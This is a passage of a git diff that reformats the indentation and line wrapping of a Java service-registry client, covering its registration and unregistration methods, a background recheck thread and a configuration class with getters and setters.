userProcessorList.add(new ReceivedConfigDataProcessor(registerCache, observerHandler)); + } else { + UserProcessor userProcessor = userProcessorMap.get(ReceivedData.class); + if (null == userProcessor) { + userProcessorList.add(new ReceivedDataProcessor(registerCache, observerHandler)); + } + userProcessor = userProcessorMap.get(ReceivedConfigData.class); + if (null == userProcessor) { + userProcessorList.add(new ReceivedConfigDataProcessor(registerCache, observerHandler)); + } + userProcessorList.addAll(userProcessorMap.values()); + } - // init user processor - List userProcessorList = new ArrayList(); - if (null == userProcessorMap) { - userProcessorList.add(new ReceivedDataProcessor(registerCache, observerHandler)); - userProcessorList.add(new ReceivedConfigDataProcessor(registerCache, observerHandler)); - } else { - UserProcessor userProcessor = userProcessorMap.get(ReceivedData.class); - if (null == userProcessor) { - userProcessorList.add(new ReceivedDataProcessor(registerCache, observerHandler)); - } - userProcessor = userProcessorMap.get(ReceivedConfigData.class); - if (null == userProcessor) { - userProcessorList.add(new ReceivedConfigDataProcessor(registerCache, - observerHandler)); - } - userProcessorList.addAll(userProcessorMap.values()); - } + // init connection event processor + if (null == connectionEventProcessorMap) { + connectionEventProcessorMap = + new HashMap( + ConnectionEventType.values().length); + } + if (null == connectionEventProcessorMap.get(ConnectionEventType.CLOSE)) { + ClientConnectionCloseEventProcessor connectionCloseEventProcessor = + new ClientConnectionCloseEventProcessor(); + connectionEventProcessorMap.put(ConnectionEventType.CLOSE, connectionCloseEventProcessor); + } + if (null == connectionEventProcessorMap.get(ConnectionEventType.CONNECT)) { + ClientConnectionOpenEventProcessor connectionOpenEventProcessor = + new ClientConnectionOpenEventProcessor(); + connectionEventProcessorMap.put(ConnectionEventType.CONNECT, connectionOpenEventProcessor); + } - // init connection event processor - if (null == connectionEventProcessorMap) { - connectionEventProcessorMap = new HashMap( - ConnectionEventType.values().length); - } - if (null == connectionEventProcessorMap.get(ConnectionEventType.CLOSE)) { - ClientConnectionCloseEventProcessor connectionCloseEventProcessor = new ClientConnectionCloseEventProcessor(); - connectionEventProcessorMap.put(ConnectionEventType.CLOSE, - connectionCloseEventProcessor); - } - if (null == connectionEventProcessorMap.get(ConnectionEventType.CONNECT)) { - ClientConnectionOpenEventProcessor connectionOpenEventProcessor = new ClientConnectionOpenEventProcessor(); - connectionEventProcessorMap.put(ConnectionEventType.CONNECT, - connectionOpenEventProcessor); - } + // init client connection and register worker + client = + new ClientConnection( + serverManager, + userProcessorList, + connectionEventProcessorMap, + registerCache, + registryClientConfig); - // init client connection and register worker - client = new ClientConnection(serverManager, userProcessorList, - connectionEventProcessorMap, registerCache, registryClientConfig); + workerThread = new WorkerThread(client, registryClientConfig, registerCache); + client.setWorker(workerThread); - workerThread = new WorkerThread(client, registryClientConfig, registerCache); - client.setWorker(workerThread); + client.init(); - client.init(); + // init registry check thread + new RegistryCheckThread().start(); - // init registry check thread - new RegistryCheckThread().start(); + // init sync config thread + new SyncConfigThread(client, registerCache, registryClientConfig, observerHandler).start(); + } - // init sync config thread - new SyncConfigThread(client, registerCache, registryClientConfig, observerHandler).start(); + /** @see RegistryClient#register(PublisherRegistration, String...) */ + @Override + public Publisher register(PublisherRegistration registration, String... data) { + if (!init.get()) { + throw new IllegalStateException("Client needs to be initialized before using."); } - /** - * @see RegistryClient#register(PublisherRegistration, String...) - */ - @Override - public Publisher register(PublisherRegistration registration, String... data) { - if (!init.get()) { - throw new IllegalStateException("Client needs to be initialized before using."); - } - - if (null == registration) { - throw new IllegalArgumentException("Registration can not be null."); - } - - if (StringUtils.isBlank(registration.getDataId())) { - throw new IllegalArgumentException("DataId can not be null"); - } - - if (StringUtils.isBlank(registration.getGroup())) { - registration.setGroup(DEFAULT_GROUP); - } - - Publisher publisher = registrationPublisherMap.get(registration); - - if (null != publisher) { - throwDuplicateException(registration, publisher); - } + if (null == registration) { + throw new IllegalArgumentException("Registration can not be null."); + } - publisher = new DefaultPublisher(registration, workerThread, registryClientConfig); - ((DefaultPublisher) publisher).setAuthManager(authManager); + if (StringUtils.isBlank(registration.getDataId())) { + throw new IllegalArgumentException("DataId can not be null"); + } - Publisher oldPublisher = registrationPublisherMap.putIfAbsent(registration, publisher); - if (null != oldPublisher) { - throwDuplicateException(registration, oldPublisher); - } + if (StringUtils.isBlank(registration.getGroup())) { + registration.setGroup(DEFAULT_GROUP); + } - registerCache.addRegister(publisher); + Publisher publisher = registrationPublisherMap.get(registration); - publisher.republish(data); + if (null != publisher) { + throwDuplicateException(registration, publisher); + } - LOGGER.info("[api] Regist publisher success, dataId: {}, group: {}, registerId: {}", - publisher.getDataId(), publisher.getGroup(), publisher.getRegistId()); + publisher = new DefaultPublisher(registration, workerThread, registryClientConfig); + ((DefaultPublisher) publisher).setAuthManager(authManager); - return publisher; + Publisher oldPublisher = registrationPublisherMap.putIfAbsent(registration, publisher); + if (null != oldPublisher) { + throwDuplicateException(registration, oldPublisher); } - private void throwDuplicateException(PublisherRegistration registration, Publisher publisher) { - LOGGER.info("[api] Publisher already exists, dataId: {}, group: {}, registerId: {}", - publisher.getDataId(), publisher.getGroup(), publisher.getRegistId()); - - throw new DuplicateException("Duplicate Publisher registration. (dataId: " - + registration.getDataId() + ", group: " - + registration.getGroup() + ")"); + registerCache.addRegister(publisher); + + publisher.republish(data); + + LOGGER.info( + "[api] Regist publisher success, dataId: {}, group: {}, registerId: {}", + publisher.getDataId(), + publisher.getGroup(), + publisher.getRegistId()); + + return publisher; + } + + private void throwDuplicateException(PublisherRegistration registration, Publisher publisher) { + LOGGER.info( + "[api] Publisher already exists, dataId: {}, group: {}, registerId: {}", + publisher.getDataId(), + publisher.getGroup(), + publisher.getRegistId()); + + throw new DuplicateException( + "Duplicate Publisher registration. (dataId: " + + registration.getDataId() + + ", group: " + + registration.getGroup() + + ")"); + } + + /** @see RegistryClient#register(SubscriberRegistration) */ + @Override + public Subscriber register(SubscriberRegistration registration) { + if (!init.get()) { + throw new IllegalStateException("Client needs to be initialized before using."); } - /** - * @see RegistryClient#register(SubscriberRegistration) - */ - @Override - public Subscriber register(SubscriberRegistration registration) { - if (!init.get()) { - throw new IllegalStateException("Client needs to be initialized before using."); - } + if (null == registration) { + throw new IllegalArgumentException("Registration can not be null."); + } - if (null == registration) { - throw new IllegalArgumentException("Registration can not be null."); - } + if (StringUtils.isBlank(registration.getDataId())) { + throw new IllegalArgumentException("DataId can not be null."); + } - if (StringUtils.isBlank(registration.getDataId())) { - throw new IllegalArgumentException("DataId can not be null."); - } + if (null == registration.getSubscriberDataObserver()) { + throw new IllegalArgumentException("Subscriber data observer can not be null."); + } - if (null == registration.getSubscriberDataObserver()) { - throw new IllegalArgumentException("Subscriber data observer can not be null."); - } + if (StringUtils.isBlank(registration.getGroup())) { + registration.setGroup(DEFAULT_GROUP); + } - if (StringUtils.isBlank(registration.getGroup())) { - registration.setGroup(DEFAULT_GROUP); - } + Subscriber subscriber = registrationSubscriberMap.get(registration); - Subscriber subscriber = registrationSubscriberMap.get(registration); + if (null != subscriber) { + throwDuplicateException(registration, subscriber); + } - if (null != subscriber) { - throwDuplicateException(registration, subscriber); - } + subscriber = new DefaultSubscriber(registration, workerThread, registryClientConfig); + ((DefaultSubscriber) subscriber).setAuthManager(authManager); - subscriber = new DefaultSubscriber(registration, workerThread, registryClientConfig); - ((DefaultSubscriber) subscriber).setAuthManager(authManager); + Subscriber oldSubscriber = registrationSubscriberMap.putIfAbsent(registration, subscriber); + if (null != oldSubscriber) { + throwDuplicateException(registration, oldSubscriber); + } - Subscriber oldSubscriber = registrationSubscriberMap.putIfAbsent(registration, subscriber); - if (null != oldSubscriber) { - throwDuplicateException(registration, oldSubscriber); - } + registerCache.addRegister(subscriber); + addRegisterTask(subscriber); - registerCache.addRegister(subscriber); - addRegisterTask(subscriber); + LOGGER.info( + "[api] Regist subscriber success, dataId: {}, group: {}, scope: {}, registerId: {}", + subscriber.getDataId(), + subscriber.getGroup(), + subscriber.getScopeEnum(), + subscriber.getRegistId()); - LOGGER.info( - "[api] Regist subscriber success, dataId: {}, group: {}, scope: {}, registerId: {}", - subscriber.getDataId(), subscriber.getGroup(), subscriber.getScopeEnum(), - subscriber.getRegistId()); + return subscriber; + } - return subscriber; + /** @see RegistryClient#register(ConfiguratorRegistration) */ + @Override + public Configurator register(ConfiguratorRegistration registration) { + if (!init.get()) { + throw new IllegalStateException("Client needs to be initialized before using."); } - /** - * @see RegistryClient#register(ConfiguratorRegistration) - */ - @Override - public Configurator register(ConfiguratorRegistration registration) { - if (!init.get()) { - throw new IllegalStateException("Client needs to be initialized before using."); - } + if (null == registration) { + throw new IllegalArgumentException("Registration can not be null."); + } - if (null == registration) { - throw new IllegalArgumentException("Registration can not be null."); - } + if (StringUtils.isBlank(registration.getDataId())) { + throw new IllegalArgumentException("DataId can not be null."); + } - if (StringUtils.isBlank(registration.getDataId())) { - throw new IllegalArgumentException("DataId can not be null."); - } + if (null == registration.getConfigDataObserver()) { + throw new IllegalArgumentException("Config data observer can not be null"); + } - if (null == registration.getConfigDataObserver()) { - throw new IllegalArgumentException("Config data observer can not be null"); - } + if (StringUtils.isBlank(registration.getGroup())) { + registration.setGroup(DEFAULT_GROUP); + } - if (StringUtils.isBlank(registration.getGroup())) { - registration.setGroup(DEFAULT_GROUP); - } + Configurator configurator = registrationConfiguratorMap.get(registration); - Configurator configurator = registrationConfiguratorMap.get(registration); + if (null != configurator) { + throwDuplicateException(configurator); + } - if (null != configurator) { - throwDuplicateException(configurator); - } + configurator = new DefaultConfigurator(registration, registryClientConfig, workerThread); + ((DefaultConfigurator) configurator).setAuthManager(authManager); - configurator = new DefaultConfigurator(registration, registryClientConfig, workerThread); - ((DefaultConfigurator) configurator).setAuthManager(authManager); + Configurator oldConfigurator = + registrationConfiguratorMap.putIfAbsent(registration, configurator); + if (null != oldConfigurator) { + throwDuplicateException(configurator); + } - Configurator oldConfigurator = registrationConfiguratorMap.putIfAbsent(registration, - configurator); - if (null != oldConfigurator) { - throwDuplicateException(configurator); - } + registerCache.addRegister(configurator); + addRegisterTask(configurator); + + LOGGER.info( + "[api] Regist configurator success, dataId: {}, registerId: {}", + configurator.getDataId(), + configurator.getRegistId()); + + return configurator; + } + + private void throwDuplicateException(Configurator configurator) { + LOGGER.info( + "[api] Configurator already exists, dataId: {}, registerId: {}", + configurator.getDataObserver(), + configurator.getRegistId()); + throw new DuplicateException( + "Duplicate configurator registration. (dataId: " + configurator.getDataId() + " )"); + } + + /** @see RegistryClient#unregister(String, String, RegistryType) */ + @Override + public int unregister(String dataId, String group, RegistryType registryType) { + if (StringUtils.isBlank(dataId)) { + throw new IllegalArgumentException("dataId can not be empty"); + } - registerCache.addRegister(configurator); - addRegisterTask(configurator); + if (null == registryType) { + throw new IllegalArgumentException("registry type can not be null"); + } - LOGGER.info("[api] Regist configurator success, dataId: {}, registerId: {}", - configurator.getDataId(), configurator.getRegistId()); + if (null == group) { + group = DEFAULT_GROUP; + } - return configurator; + List registers = new ArrayList(); + + if (RegistryType.PUBLISHER == registryType) { + Collection publishers = registerCache.getAllPublishers(); + for (Publisher publisher : publishers) { + if (dataId.equals(publisher.getDataId()) && group.equals(publisher.getGroup())) { + registers.add(publisher); + } + } + } else if (RegistryType.SUBSCRIBER == registryType) { + Collection subscribers = registerCache.getAllSubscribers(); + for (Subscriber subscriber : subscribers) { + if (dataId.equals(subscriber.getDataId()) && group.equals(subscriber.getGroup())) { + registers.add(subscriber); + } + } + } else if (RegistryType.CONFIGURATOR == registryType) { + Collection configurators = registerCache.getAllConfigurator(); + for (Configurator configurator : configurators) { + if (dataId.equals(configurator.getDataId())) { + registers.add(configurator); + } + } } - private void throwDuplicateException(Configurator configurator) { - LOGGER.info("[api] Configurator already exists, dataId: {}, registerId: {}", - configurator.getDataObserver(), configurator.getRegistId()); - throw new DuplicateException("Duplicate configurator registration. (dataId: " - + configurator.getDataId() + " )"); + for (Register register : registers) { + register.unregister(); + } + return registers.size(); + } + + private void throwDuplicateException(SubscriberRegistration registration, Subscriber subscriber) { + LOGGER.info( + "[api] Subscriber already exists, dataId: {}, group: {}, scope: {}, registerId: {}", + subscriber.getDataId(), + subscriber.getGroup(), + subscriber.getScopeEnum(), + subscriber.getRegistId()); + throw new DuplicateException( + "Duplicate subscriber registration. (dataId: " + + registration.getDataId() + + ", group: " + + registration.getGroup() + + ")"); + } + + /** + * Add register task. + * + * @param register the register + * @throws RegistryClientException the registry client exception + */ + private void addRegisterTask(Register register) throws RegistryClientException { + try { + TaskEvent event = new TaskEvent(register); + workerThread.schedule(event); + } catch (Exception e) { + LOGGER.error("Register task schedule error, {}", register, e); + throw new RegistryClientException("Register task schedule error", e); + } + } + + /** + * Getter method for property registerCache. + * + * @return property value of registerCache + */ + public RegisterCache getRegisterCache() { + return registerCache; + } + + /** + * Setter method for property userProcessorMap. + * + * @param userProcessorMap value to be assigned to property userProcessorMap + */ + public void setUserProcessorMap(Map, UserProcessor> userProcessorMap) { + this.userProcessorMap = userProcessorMap; + } + + /** + * Setter method for property connectionEventProcessorMap. + * + * @param connectionEventProcessorMap value to be assigned to property connectionEventProcessorMap + */ + public void setConnectionEventProcessorMap( + Map connectionEventProcessorMap) { + this.connectionEventProcessorMap = connectionEventProcessorMap; + } + + /** + * Setter method for property observerHandler. + * + * @param observerHandler value to be assigned to property observerHandler + */ + public void setObserverHandler(ObserverHandler observerHandler) { + this.observerHandler = observerHandler; + } + + /** + * Setter method for property serverManager. + * + * @param serverManager value to be assigned to property serverManager + */ + public void setServerManager(ServerManager serverManager) { + this.serverManager = serverManager; + } + + /** + * Setter method for property authManager. + * + * @param authManager value to be assigned to property authManager + */ + public void setAuthManager(AuthManager authManager) { + this.authManager = authManager; + } + + /** + * Setter method for property lookoutSubscriber. + * + * @param lookoutSubscriber value to be assigned to property lookoutSubscriber + */ + public void setLookoutSubscriber(LookoutSubscriber lookoutSubscriber) { + this.lookoutSubscriber = lookoutSubscriber; + } + + /** + * Setter method for property eventBus. + * + * @param eventBus value to be assigned to property eventBus + */ + public void setEventBus(EventBus eventBus) { + this.eventBus = eventBus; + } + + /** The type Registry check thread. */ + class RegistryCheckThread extends Thread { + + /** Instantiates a new Registry check thread. */ + public RegistryCheckThread() { + super("RegistryClientCheckThread"); + setDaemon(true); } - /** - * @see RegistryClient#unregister(String, String, RegistryType) - */ + /** @see Thread#run() */ @Override - public int unregister(String dataId, String group, RegistryType registryType) { - if (StringUtils.isBlank(dataId)) { - throw new IllegalArgumentException("dataId can not be empty"); - } + public void run() { - if (null == registryType) { - throw new IllegalArgumentException("registry type can not be null"); - } - - if (null == group) { - group = DEFAULT_GROUP; - } + //noinspection InfiniteLoopStatement + while (true) { + try { + Thread.sleep(registryClientConfig.getRecheckInterval()); - List registers = new ArrayList(); + Collection allPublishers = registerCache.getAllPublishers(); - if (RegistryType.PUBLISHER == registryType) { - Collection publishers = registerCache.getAllPublishers(); - for (Publisher publisher : publishers) { - if (dataId.equals(publisher.getDataId()) && group.equals(publisher.getGroup())) { - registers.add(publisher); - } - } - } else if (RegistryType.SUBSCRIBER == registryType) { - Collection subscribers = registerCache.getAllSubscribers(); - for (Subscriber subscriber : subscribers) { - if (dataId.equals(subscriber.getDataId()) && group.equals(subscriber.getGroup())) { - registers.add(subscriber); - } - } - } else if (RegistryType.CONFIGURATOR == registryType) { - Collection configurators = registerCache.getAllConfigurator(); - for (Configurator configurator : configurators) { - if (dataId.equals(configurator.getDataId())) { - registers.add(configurator); - } + for (Publisher publisher : allPublishers) { + try { + if (null != publisher && !((AbstractInternalRegister) publisher).isDone()) { + addRegisterTask(publisher); + } + } catch (Exception e) { + LOGGER.error("Sync publisher error, {}", publisher, e); } - } + } - for (Register register : registers) { - register.unregister(); - } - return registers.size(); - } - - private void throwDuplicateException(SubscriberRegistration registration, Subscriber subscriber) { - LOGGER.info( - "[api] Subscriber already exists, dataId: {}, group: {}, scope: {}, registerId: {}", - subscriber.getDataId(), subscriber.getGroup(), subscriber.getScopeEnum(), - subscriber.getRegistId()); - throw new DuplicateException("Duplicate subscriber registration. (dataId: " - + registration.getDataId() + ", group: " - + registration.getGroup() + ")"); - } - - /** - * Add register task. - * - * @param register the register - * @throws RegistryClientException the registry client exception - */ - private void addRegisterTask(Register register) throws RegistryClientException { - try { - TaskEvent event = new TaskEvent(register); - workerThread.schedule(event); - } catch (Exception e) { - LOGGER.error("Register task schedule error, {}", register, e); - throw new RegistryClientException("Register task schedule error", e); - } - } + Collection allSubscribers = registerCache.getAllSubscribers(); - /** - * Getter method for property registerCache. - * - * @return property value of registerCache - */ - public RegisterCache getRegisterCache() { - return registerCache; - } - - /** - * Setter method for property userProcessorMap. - * - * @param userProcessorMap value to be assigned to property userProcessorMap - */ - public void setUserProcessorMap(Map, UserProcessor> userProcessorMap) { - this.userProcessorMap = userProcessorMap; - } - - /** - * Setter method for property connectionEventProcessorMap. - * - * @param connectionEventProcessorMap value to be assigned to property connectionEventProcessorMap - */ - public void setConnectionEventProcessorMap(Map connectionEventProcessorMap) { - this.connectionEventProcessorMap = connectionEventProcessorMap; - } - - /** - * Setter method for property observerHandler. - * - * @param observerHandler value to be assigned to property observerHandler - */ - public void setObserverHandler(ObserverHandler observerHandler) { - this.observerHandler = observerHandler; - } - - /** - * Setter method for property serverManager. - * - * @param serverManager value to be assigned to property serverManager - */ - public void setServerManager(ServerManager serverManager) { - this.serverManager = serverManager; - } - - /** - * Setter method for property authManager. - * - * @param authManager value to be assigned to property authManager - */ - public void setAuthManager(AuthManager authManager) { - this.authManager = authManager; - } - - /** - * Setter method for property lookoutSubscriber. - * - * @param lookoutSubscriber value to be assigned to property lookoutSubscriber - */ - public void setLookoutSubscriber(LookoutSubscriber lookoutSubscriber) { - this.lookoutSubscriber = lookoutSubscriber; - } - - /** - * Setter method for property eventBus. - * - * @param eventBus value to be assigned to property eventBus - */ - public void setEventBus(EventBus eventBus) { - this.eventBus = eventBus; - } - - /** - * The type Registry check thread. - */ - class RegistryCheckThread extends Thread { - - /** - * Instantiates a new Registry check thread. - */ - public RegistryCheckThread() { - super("RegistryClientCheckThread"); - setDaemon(true); - } + for (Subscriber subscriber : allSubscribers) { + try { + if (null != subscriber && !((AbstractInternalRegister) subscriber).isDone()) { + addRegisterTask(subscriber); + } + } catch (Exception e) { + LOGGER.error("Sync subscriber error, {}", subscriber, e); + } + } + + Collection allConfigurators = registerCache.getAllConfigurator(); - /** - * @see Thread#run() - */ - @Override - public void run() { - - //noinspection InfiniteLoopStatement - while (true) { - try { - Thread.sleep(registryClientConfig.getRecheckInterval()); - - Collection allPublishers = registerCache.getAllPublishers(); - - for (Publisher publisher : allPublishers) { - try { - if (null != publisher - && !((AbstractInternalRegister) publisher).isDone()) { - addRegisterTask(publisher); - } - } catch (Exception e) { - LOGGER.error("Sync publisher error, {}", publisher, e); - } - } - - Collection allSubscribers = registerCache.getAllSubscribers(); - - for (Subscriber subscriber : allSubscribers) { - try { - if (null != subscriber - && !((AbstractInternalRegister) subscriber).isDone()) { - addRegisterTask(subscriber); - } - } catch (Exception e) { - LOGGER.error("Sync subscriber error, {}", subscriber, e); - } - } - - Collection allConfigurators = registerCache.getAllConfigurator(); - - for (Configurator configurator : allConfigurators) { - try { - if (null != configurator - && !((AbstractInternalRegister) configurator).isDone()) { - addRegisterTask(configurator); - } - } catch (Exception e) { - LOGGER.error("Sync configurator error, {}", configurator, e); - } - } - } catch (Throwable e) { - LOGGER.error("Execute error", e); - } + for (Configurator configurator : allConfigurators) { + try { + if (null != configurator && !((AbstractInternalRegister) configurator).isDone()) { + addRegisterTask(configurator); + } + } catch (Exception e) { + LOGGER.error("Sync configurator error, {}", configurator, e); } + } + } catch (Throwable e) { + LOGGER.error("Execute error", e); } - + } } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfig.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfig.java index ee8c4caca..8a74426fd 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfig.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfig.java @@ -26,437 +26,491 @@ */ public class DefaultRegistryClientConfig implements RegistryClientConfig { - /** */ - private String env; - - /** */ - private String instanceId; - - /** */ - private String zone; - - /** */ - private String registryEndpoint; - - /** */ - private int registryEndpointPort; - - /** */ - private String dataCenter; - - /** */ - private String appName; - - /** */ - private int connectTimeout; - - /** */ - private int socketTimeout; - - /** */ - private int invokeTimeout; - - /** */ - private int recheckInterval; - - /** */ - private int observerThreadCoreSize; - - /** */ - private int observerThreadMaxSize; - - /** */ - private int observerThreadQueueLength; - - /** */ - private int observerCallbackTimeout; - - /** */ - private int syncConfigRetryInterval; - - /** */ - private String accessKey; - - /** */ - private String secretKey; - - /** */ - private String algorithm; - - /** */ - private long authCacheInterval; - - /** */ - private boolean eventBusEnable; - - /** - * Instantiates a new Default registry client config. - * - * @param env the env - * @param instanceId the instance id - * @param zone the zone - * @param registryEndpoint the registry endpoint - * @param registryEndpointPort the registry endpoint port - * @param dataCenter the data center - * @param appName the app name - * @param connectTimeout the connect timeout - * @param socketTimeout the socket timeout - * @param invokeTimeout the invoke timeout - * @param recheckInterval the recheck interval - * @param observerThreadCoreSize the observer thread core size - * @param observerThreadMaxSize the observer thread max size - * @param observerThreadQueueLength the observer thread queue length - * @param observerCallbackTimeout the observer callback timeout - * @param syncConfigRetryInterval the sync config retry interval - * @param accessKey the access key - * @param secretKey the secret key - * @param algorithm the algorithm - * @param authCacheInterval the auth cache interval - */ - public DefaultRegistryClientConfig(String env, String instanceId, String zone, - String registryEndpoint, int registryEndpointPort, - String dataCenter, String appName, int connectTimeout, - int socketTimeout, int invokeTimeout, int recheckInterval, - int observerThreadCoreSize, int observerThreadMaxSize, - int observerThreadQueueLength, int observerCallbackTimeout, - int syncConfigRetryInterval, String accessKey, - String secretKey, String algorithm, long authCacheInterval, - boolean eventBusEnable) { - this.env = env; - this.instanceId = instanceId; - this.zone = zone; - this.registryEndpoint = registryEndpoint; - this.registryEndpointPort = registryEndpointPort; - this.dataCenter = dataCenter; - this.appName = appName; - this.connectTimeout = connectTimeout; - this.socketTimeout = socketTimeout; - this.invokeTimeout = invokeTimeout; - this.recheckInterval = recheckInterval; - this.observerThreadCoreSize = observerThreadCoreSize; - this.observerThreadMaxSize = observerThreadMaxSize; - this.observerThreadQueueLength = observerThreadQueueLength; - this.observerCallbackTimeout = observerCallbackTimeout; - this.syncConfigRetryInterval = syncConfigRetryInterval; - this.accessKey = accessKey; - this.secretKey = secretKey; - this.algorithm = algorithm; - this.authCacheInterval = authCacheInterval; - this.eventBusEnable = eventBusEnable; + /** */ + private String env; + + /** */ + private String instanceId; + + /** */ + private String zone; + + /** */ + private String registryEndpoint; + + /** */ + private int registryEndpointPort; + + /** */ + private String dataCenter; + + /** */ + private String appName; + + /** */ + private int connectTimeout; + + /** */ + private int socketTimeout; + + /** */ + private int invokeTimeout; + + /** */ + private int recheckInterval; + + /** */ + private int observerThreadCoreSize; + + /** */ + private int observerThreadMaxSize; + + /** */ + private int observerThreadQueueLength; + + /** */ + private int observerCallbackTimeout; + + /** */ + private int syncConfigRetryInterval; + + /** */ + private String accessKey; + + /** */ + private String secretKey; + + /** */ + private String algorithm; + + /** */ + private long authCacheInterval; + + /** */ + private boolean eventBusEnable; + + /** + * Instantiates a new Default registry client config. + * + * @param env the env + * @param instanceId the instance id + * @param zone the zone + * @param registryEndpoint the registry endpoint + * @param registryEndpointPort the registry endpoint port + * @param dataCenter the data center + * @param appName the app name + * @param connectTimeout the connect timeout + * @param socketTimeout the socket timeout + * @param invokeTimeout the invoke timeout + * @param recheckInterval the recheck interval + * @param observerThreadCoreSize the observer thread core size + * @param observerThreadMaxSize the observer thread max size + * @param observerThreadQueueLength the observer thread queue length + * @param observerCallbackTimeout the observer callback timeout + * @param syncConfigRetryInterval the sync config retry interval + * @param accessKey the access key + * @param secretKey the secret key + * @param algorithm the algorithm + * @param authCacheInterval the auth cache interval + */ + public DefaultRegistryClientConfig( + String env, + String instanceId, + String zone, + String registryEndpoint, + int registryEndpointPort, + String dataCenter, + String appName, + int connectTimeout, + int socketTimeout, + int invokeTimeout, + int recheckInterval, + int observerThreadCoreSize, + int observerThreadMaxSize, + int observerThreadQueueLength, + int observerCallbackTimeout, + int syncConfigRetryInterval, + String accessKey, + String secretKey, + String algorithm, + long authCacheInterval, + boolean eventBusEnable) { + this.env = env; + this.instanceId = instanceId; + this.zone = zone; + this.registryEndpoint = registryEndpoint; + this.registryEndpointPort = registryEndpointPort; + this.dataCenter = dataCenter; + this.appName = appName; + this.connectTimeout = connectTimeout; + this.socketTimeout = socketTimeout; + this.invokeTimeout = invokeTimeout; + this.recheckInterval = recheckInterval; + this.observerThreadCoreSize = observerThreadCoreSize; + this.observerThreadMaxSize = observerThreadMaxSize; + this.observerThreadQueueLength = observerThreadQueueLength; + this.observerCallbackTimeout = observerCallbackTimeout; + this.syncConfigRetryInterval = syncConfigRetryInterval; + this.accessKey = accessKey; + this.secretKey = secretKey; + this.algorithm = algorithm; + this.authCacheInterval = authCacheInterval; + this.eventBusEnable = eventBusEnable; + } + + /** + * Getter method for property env. + * + * @return property value of env + */ + @Override + public String getEnv() { + return env; + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + @Override + public String getInstanceId() { + return instanceId; + } + + /** + * Getter method for property zone. + * + * @return property value of zone + */ + @Override + public String getZone() { + return zone; + } + + /** + * Getter method for property registryEndpoint. + * + * @return property value of registryEndpoint + */ + @Override + public String getRegistryEndpoint() { + return registryEndpoint; + } + + /** + * Getter method for property registryEndpointPort. + * + * @return property value of registryEndpointPort + */ + @Override + public int getRegistryEndpointPort() { + return registryEndpointPort; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + @Override + public String getDataCenter() { + return dataCenter; + } + + /** + * Getter method for property appName. + * + * @return property value of appName + */ + @Override + public String getAppName() { + return appName; + } + + /** + * Getter method for property connectTimeout. + * + * @return property value of connectTimeout + */ + @Override + public int getConnectTimeout() { + return connectTimeout; + } + + /** + * Getter method for property socketTimeout. + * + * @return property value of socketTimeout + */ + @Override + public int getSocketTimeout() { + return socketTimeout; + } + + /** + * Getter method for property invokeTimeout. + * + * @return property value of invokeTimeout + */ + @Override + public int getInvokeTimeout() { + return invokeTimeout; + } + + /** + * Getter method for property recheckInterval. + * + * @return property value of recheckInterval + */ + @Override + public int getRecheckInterval() { + return recheckInterval; + } + + /** + * Getter method for property observerThreadCoreSize. + * + * @return property value of observerThreadCoreSize + */ + @Override + public int getObserverThreadCoreSize() { + return observerThreadCoreSize; + } + + /** + * Getter method for property observerThreadMaxSize. + * + * @return property value of observerThreadMaxSize + */ + @Override + public int getObserverThreadMaxSize() { + return observerThreadMaxSize; + } + + /** + * Getter method for property observerThreadQueueLength. + * + * @return property value of observerThreadQueueLength + */ + @Override + public int getObserverThreadQueueLength() { + return observerThreadQueueLength; + } + + /** + * Getter method for property observerCallbackTimeout. + * + * @return property value of observerCallbackTimeout + */ + @Override + public int getObserverCallbackTimeout() { + return observerCallbackTimeout; + } + + /** + * Getter method for property syncConfigRetryInterval. + * + * @return property value of syncConfigRetryInterval + */ + @Override + public int getSyncConfigRetryInterval() { + return syncConfigRetryInterval; + } + + /** + * Getter method for property accessKey. + * + * @return property value of accessKey + */ + @Override + public String getAccessKey() { + return accessKey; + } + + /** + * Getter method for property secretKey. + * + * @return property value of secretKey + */ + @Override + public String getSecretKey() { + return secretKey; + } + + /** + * Getter method for property algorithm. + * + * @return property value of algorithm + */ + @Override + public String getAlgorithm() { + return algorithm; + } + + /** + * Setter method for property algorithm. + * + * @param algorithm value to be assigned to property algorithm + */ + public void setAlgorithm(String algorithm) { + this.algorithm = algorithm; + } + + /** + * Getter method for property authCacheInterval. + * + * @return property value of authCacheInterval + */ + @Override + public long getAuthCacheInterval() { + return authCacheInterval; + } + + /** + * Setter method for property authCacheInterval. + * + * @param authCacheInterval value to be assigned to property authCacheInterval + */ + public void setAuthCacheInterval(long authCacheInterval) { + this.authCacheInterval = authCacheInterval; + } + + /** + * Getter method for property eventBusEnable. + * + * @return property value of eventBusEnable + */ + @Override + public boolean isEventBusEnable() { + return eventBusEnable; + } + + /** + * Setter method for property eventBusEnable. + * + * @param eventBusEnable value to be assigned to property eventBusEnable + */ + public void setEventBusEnable(boolean eventBusEnable) { + this.eventBusEnable = eventBusEnable; + } + + /** + * Equals boolean. + * + * @param o the o + * @return the boolean + */ + @Override + public boolean equals(Object o) { + if (this == o) { + return true; } - - /** - * Getter method for property env. - * - * @return property value of env - */ - @Override - public String getEnv() { - return env; - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - @Override - public String getInstanceId() { - return instanceId; - } - - /** - * Getter method for property zone. - * - * @return property value of zone - */ - @Override - public String getZone() { - return zone; - } - - /** - * Getter method for property registryEndpoint. - * - * @return property value of registryEndpoint - */ - @Override - public String getRegistryEndpoint() { - return registryEndpoint; + if (!(o instanceof DefaultRegistryClientConfig)) { + return false; } - /** - * Getter method for property registryEndpointPort. - * - * @return property value of registryEndpointPort - */ - @Override - public int getRegistryEndpointPort() { - return registryEndpointPort; - } + DefaultRegistryClientConfig that = (DefaultRegistryClientConfig) o; - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - @Override - public String getDataCenter() { - return dataCenter; + if (registryEndpointPort != that.registryEndpointPort) { + return false; } - - /** - * Getter method for property appName. - * - * @return property value of appName - */ - @Override - public String getAppName() { - return appName; + if (env != null ? !env.equals(that.env) : that.env != null) { + return false; } - - /** - * Getter method for property connectTimeout. - * - * @return property value of connectTimeout - */ - @Override - public int 